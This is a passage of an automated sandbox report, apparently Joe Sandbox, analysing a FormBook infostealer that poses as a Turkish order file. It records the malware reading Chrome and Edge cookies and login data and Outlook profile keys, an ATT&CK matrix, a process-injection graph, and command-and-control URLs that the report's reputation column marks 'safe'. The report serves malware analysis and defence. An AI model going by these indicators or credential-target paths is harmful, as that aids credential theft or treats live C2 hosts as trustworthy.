            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467071 Sample: 03.07.2024-sipari#U015f UG0... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 35 www.qdfake525pm.xyz 2->35 37 www.ybw73.top 2->37 39 19 other IPs or domains 2->39 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 55 7 other signatures 2->55 10 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 03.07.2024-sipari#...ve Tic a.s .exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 akwoJPEqdiyPQmCnaGzo.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 fc.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 akwoJPEqdiyPQmCnaGzo.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 qdfake525pm.xyz 38.150.29.6, 49742, 80 COGENT-174US United States 27->41 43 www.monchosoft.com 46.30.211.38, 49763, 49764, 49765 ONECOMDK Denmark 27->43 45 9 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe34%ReversingLabsWin32.Trojan.Generic
            03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designers/?0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com/designers?0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://www.fontbureau.com/designers0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fonts.com0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
            http://www.fontbureau.com0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
            http://www.saalameh.com/hfb9/?lxRlvTSh=fwSRWDIDlEtpZKpO15TnR7rdvvbvUQOUwoPVjl38Pi8M+UCq29ZeNKRmFQz0yoK86tSBJtX0+7UQykNFUthSdrPfT9CD49CruGe2y7ZC/ovpvsGUE+526xA=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.qdfake525pm.xyz/a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fontbureau.com/designers80%URL Reputationsafe
            http://www.66hc7.com/ooz9/?lxRlvTSh=MlFGyqpiH0BFSJI/fef/dCG888BGWBIcHVtVHklmmXS6c3kDIZAL8aaEfl7Aaohh3sZenWVq3ThPiwkLLGk004Us/fWH1X98Emf9JC/rX1g9bPHIk5sfq80=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            http://www.monchosoft.com/735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            http://goge8opp.com:3010%Avira URL Cloudsafe
            http://www.hissmjkl.com/m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.valerieomage.com/k2gj/0%Avira URL Cloudsafe
            http://www.saalameh.com/hfb9/0%Avira URL Cloudsafe
            http://www.devele.top/nm4d/0%Avira URL Cloudsafe
            http://www.66hc7.com/ooz9/0%Avira URL Cloudsafe
            http://www.kaps4kancer.org/tqvk/0%Avira URL Cloudsafe
            http://www.theweekendcreator.com/4h78/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.kaps4kancer.org/tqvk/?lxRlvTSh=sqV4H0HgKEmT+MSVPZvHtNNOCugFouPGcNtakGXEq4+Q8zlVn8x6bNcZA2Wcm7hNKJFeivErhIl2wMRsNIGAokWHBtGrsDvz+bZZo+cuUvU/JTN/Qn5+SZw=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.ybw73.top/0ag0/?lxRlvTSh=ijsxwTuQWQMrQrpunY58zmHtK7oEhmVQOqZdZNdH7TeXDSEes5ptIscTzSElyzixUNFuHL69iVpfwUSC4AMHMDnys0WZTFD5qHcVGhhYgxj+QsPKbvjZ0mA=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            http://www.theweekendcreator.com/4h78/?lxRlvTSh=bXG7bLU8VpdhFuw8OEWepvz+lmtIgfU4QefCRLOwt0xUHukcXkmHP9rgqbjL97YnLUFJGTOXt4l1DZESwR3Y2jPuWZfGScD+gHNftK8/3r/KPWW9Eddz3K4=&kh=9PxLvhoHS40%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
            http://www.hissmjkl.com/m0xz/0%Avira URL Cloudsafe
            http://www.ybw73.top/0ag0/0%Avira URL Cloudsafe
